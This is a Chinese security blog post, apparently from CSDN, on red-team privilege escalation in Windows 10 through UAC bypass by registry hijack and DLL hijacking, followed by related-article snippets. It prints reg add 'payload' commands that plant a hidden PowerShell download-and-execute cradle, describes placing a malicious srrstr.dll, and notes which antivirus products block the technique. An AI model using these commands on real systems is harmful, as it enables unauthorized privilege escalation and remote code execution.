红蓝对抗之win10 权限提升

已于 2022-07-04 16:17:01 修改
阅读量2.2k 收藏 7
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 网安 文章标签: 网络安全
于 2022-07-04 11:53:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37561898/article/details/125596590

当我们拿下一台windows10的低权限用户时,可以尝试进行提权以获得更多的渗透可能性。

注册表修改Bypass UAC:

有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exewusa.exetaskmgr.exemsra.exeeudcedit.exeeventvwr.exeCompMgmtLauncher.exerundll32.exeexplorer.exe

这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC提权操作

利用CompMgmtLauncher.exe提权,该程序在启动时会查询注册表项"Software\classes\mscfile\shell\open\command"(msc后缀文件默认打开方式)、如果存在就会以管理员权限去执行该项默认程序。

提权方式。修改注册表项,更改数据达到权限提升的目的

小知识:regedit 会弹出uac需要用户确认,且容易被杀毒软件拦截。而 reg  相对比较不敏感这个后面再说。

 

 

payload:

reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:30328/')

reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:45019/')

Windows Defen : 当我reg 或者regedit执行修改注册表时都会进行拦截。

360安全卫士: 当我安装完360安全卫士的时候,360自动接管windows def reg 执行成功并且没有弹窗 regedit 依旧会弹出弹窗,并且都不拦截(360yyds)

 提权成功,尝试创建管理员账户。

Dll劫持bypass UAC:

dll劫持原理:dll (Dynamic Link Library)动态链接库 ,个人认为其实跟linux的os劫持大同小异,在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。

拿网易云的劫持来说, cloudmusic_reporter.exe需要调用libcurl.dll文件,提前把libcurl.dll替换成恶意构造的dll,那么cloudmusic_reporter.exe就会加载恶意构造的dll文件,这就达到了劫持目的。

如Wegame,当我们点击启动时会自动调用需要依赖的.dll文件,这个时候我们把.dll文件构造成恶意payload就会被自动加载,同样我们启动开头讲过的白名单程序时就达到了bypass uac 提权的目的。

 dll劫持方法:

(1) DLL替换:用恶意的DLL替换掉合法的DLL

(2) DLL搜索顺序劫持:当应用程序加载DLL的时候,如果没有带指定DLL的路径,那么程序将会以特定的顺序依次在指定的路径下搜索待加载的DLL。通过将恶意DLL放在真实DLL之前的搜索位置,就可以劫持搜索顺序,劫持的目录有时候包括目标应用程序的工作目录。

(3) 虚拟DLL劫持:释放一个恶意的DLL来代替合法应用程序加载的丢失/不存在的DLL

(4) DLL重定向:更改DLL搜索的路径,比如通过编辑%PATH%环境变量或 .exe.manifest/.exe.local文件以将搜索路径定位到包含恶意DLL的地方。

(5) WinSxS DLL替换:将目标DLL相关的WinSxS文件夹中的恶意DLL替换为合法的DLL。此方法通常也被称为DLL侧加载

(6) 相对路径DLL劫持:将合法的应用程序复制(并有选择地重命名)与恶意的DLL一起放入到用户可写的文件夹中。在使用方法上,它与(签名的)二进制代理执行有相似之处。它的一个变体是(有点矛盾地称为)“自带LOLbin”,其中合法的应用程序带有恶意的DLL(而不是从受害者机器上的合法位置复制)。

这里我们使用windows原生软件提权 C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe (不存在于win10 及更高)

加载过程:

  • C:\Windows\SysWOW64\srrstr.dll
  • C:\Windows\System\srrstr.dll
  • C:\Windows\srrstr.dll
  • C:\Windows\SysWOW64\wbem\srrstr.dll
  • C:\Windows\SysWOW64\WindowsPowershell\v1.0\srrstr.dll
  • C:\Users<Username>\APPData\Local\Microsoft\WindowsApps\srrstr.dll
     

在最后它会寻找 C:\Users\<Username>\APPData\Local\Microsoft\WindowsApps\ 这个目录,而这个目录的读写是不需要触发UAC获得管理员权限来操作的。
将Coolis转换成DLL,上传至 C:\Users\<Username>\APPData\Local\Microsoft\WindowsApps\ ,紧接着执行SystemPropertiesAdvanced.exe,它会自动将 srrstr.dll 加载至SystemPropertiesAdvanced.exe进程的内存,同样的,我们也就拥有了管理员权限

构建恶意dll.

将构造好的srrstr.dll放入到windowssapps目录下,再运行SystemPropertiesAdvanced.exe发现提权成功。

红蓝对抗之红队免杀开发实践
悦分享
08-04 2124
我们在这个加载程序中执行的beacon shellcode最终是一个需要在内存中执行的DLL。许多C2框架利用了Stephen Fewer的。解析加载DLL所需kernel32.dll WINAPI的地址(例如VirtualAlloc, LoadLibraryA等);将DLL及其相应的节写入内存中;建立DLL导入表,以便DLL可以调用ntdll.dll和kernel32.dll WINAPI;加载额外的库并解析其导入函数地址;调用DLL的入口点。...
APT级全面免杀与企业纵深防御体系的红蓝对抗
悦分享
08-03 908
本文通过模拟APT演示了高级威胁的全面免杀能力,并站在防御者角度思考如何发现、检测和防御高级威胁攻击,从而了解到攻防的对抗性,体会了企业建设纵深防御体系的重要性。
解决win10问题,一键,方便
07-26
希望能帮助大家,大家可以试试,我就是这么解决的,很方便
windows10
qq_54030686的博客
11-15 3014
即可查看到,这里目标是以Administartor限测试,这里不进行验证,我都有Administartor了,我直接msf下面getsystem即可,getsystem实际上也是令牌窃取。里面共描述了服务路径,文件限,计划任务,令牌窃取,图形化软件,应用组件安装等,这里只有令牌窃取需要管理员Administrator限,值得注意的是该限并不是管理员组中的其他用户。发现该文件以system限运行,而我们拥有对该文件的修改限,修改daclsve服务的具体执行文件,从而获取system限。
关于Windows,这些事项你要注意,(非常详细)从零基础到精通,收藏这篇就够了
最新发布
Python_0011的博客
06-07 907
UAC(User Account Control),用户帐户控制,是Windows Vista及以上版本引入的安全机制,它要求用户在执行可能影响系统安全的操作前,必须供管理员限或密码。令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求属于哪一个用户的。它允许你在不供密码或其他凭证的前下,访问网络和系统资源。令牌最大的特点就是随机性,不可预测。所谓的烂土豆就是俗称的MS16-075,其是一个本地,是针对本地用户的,不能用于域用户。
win10
qq56hm的博客
12-08 866
我的电脑->管理->本地用户和组->左键单击自己的用户名称->属性->隶属于->添加->输入电脑名称/System Managed Accounts Group->重启电脑
限,轻松运行:Windows10管理员限设置指南
2408_89109914的博客
11-27 3614
在日常使用Windows 10系统的过程中,有时会遇到需要管理员限才能运行的程序或文件。为了确保系统的安全性和稳定性,Windows 10默认情况下会对某些操作进行限限制。然而,这并不意味着我们无法获得所需的限。本文将为大家详细介绍如何在Windows 10系统中设置管理员限,以便轻松运行各种程序和文件。
windows 10 升管理员
程金鹏(程利鹏)
04-21 2万+
在我们编写代码的过程中,部分程序的运行就需要升管理员限才可以。下面我来说一下将本用户升管理员限的方式,而不是增加一个管理员用户。环境:1)本方法仅适用专业版、教育版、企业版。不适合家庭版。步骤:1、用 win + R 快捷键打开运行框。如果你的系统在下图中的红色矩形框内有此字样,则证明你已经拥有管理员限。否则,输入“secpol.msc”之后回车。2.双击“本地策略 ”,双击“安全选项”,
红蓝对抗Windows内网渗透
Tencent_SRC的博客
06-29 6481
无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进...
win10 升administrator限 管理员
反贪局
01-08 1775
打开策略管理,win+r,输入gpedit.msc; 选择**计算机配置 > Windows设置 > 安全设置 > 本地策略 > 安全选项 **,按照下图红框设置;
windows
qq_38675102的博客
12-31 2527
windwos自学笔记-保持更新
windows工具
01-15
可以对win2K3-win2012 server进行 win7也可以,win10没试过
windows系统工具.zip
12-25
windows7,windows2003等系统的工具,psexec.exe程序可以实现windows7和2003的,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的进程。
权限提升 -Win系统限升级
weixin_53736204的博客
08-30 1656
应用场景1、常规某个机器被钓⻥后⻔攻击后,我们需要做更⾼限操作或限维持等。2、内⽹域中某个机器被钓⻥后⻔攻击后,我们需要对后续内⽹域做安全测试。
win10CVE-2021-1732
Shanfenglan's blog
03-11 3868
文章目录前言利用过程 前言 无意中看见的,收藏一下 利用过程 利用exp:https://github.com/shanfenglan/test/blob/master/cve-2021-1732.exe 使用方法: cve-2021-1732.exe "whoami"
win10获得system限(超级管理员)
热门推荐
kaka0930的博客
05-18 13万+
1.昨天安装win10专业版。想删除之前各个盘里面多余的文件,却遇到program Files下面的文件需要system限。所以便找方法获得了限。 2.首先,system是超级管理员,不是管理员。所有那些说系统用户管理那里启用administer的方法是不行的。 3.这个方法也没有成功。    右键文件夹-属性-安全-高级-所有者改为当前用户    限标签页选中当前用户更改限 ,勾
windows系统权限提升
weixin_53639243的博客
04-23 4721
方法。
win10_x64下shellcode工具(SYSTEM限)
Anansi的博客
11-22 3910
之前写过一篇远线程注入与一篇shellcode编写的文章: Win10_X64远线程注入dll(非CreateRemoteThread) Windows 10_X64环境shellcode编写 上一次是通过远线程注入,将指定的dll模块加载进我们指定的进程,这一次将我们写好的shellcode注入进指定的进程,从而执行任意代码。 首先我们要清楚如何获取一个具有system限的cmd,想要获取一个具有system限的cmd,首先这个cmd得是一个具有system限进程的子进程,windows下具有sys
Win10系统通过技巧将标准用户升为管理员限:实现目标跟踪
IiTraining的博客
09-18 713
本文将介绍一些技巧和步骤,帮助您将标准用户更改为管理员,并实现目标跟踪。完成以上所有步骤后,目标用户将被升为管理员,并且他们将能够执行需要管理员限的任务。在"选择组"对话框中,您将看到一个包含所有可用组的列表。在这里,找到并选择"管理员"组,然后单击"确定"按钮。在"成员资格"标签下,您将看到一个列表,其中列出了当前用户的所属组。在"本地用户和组"下,您将看到"用户"选项。在"用户"列表中,找到您想要升为管理员的目标标准用户账户。在计算机管理控制台中,您将看到左侧导航栏中的"本地用户和组"。
HackTool/Mikatz是什么类型的病毒,会造成什么危害?如何删除和防止?
02-27
- **定期红蓝对抗演练**:模拟攻击者使用Mimikatz的路径,验证防御体系有效性。 - **凭据哈希同步禁用**:在域控制器上设置 `DSHEURISTICS` 属性,阻止NTLM哈希存储。 - **硬件级防护**:采用TPM芯片或HSM模块保护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值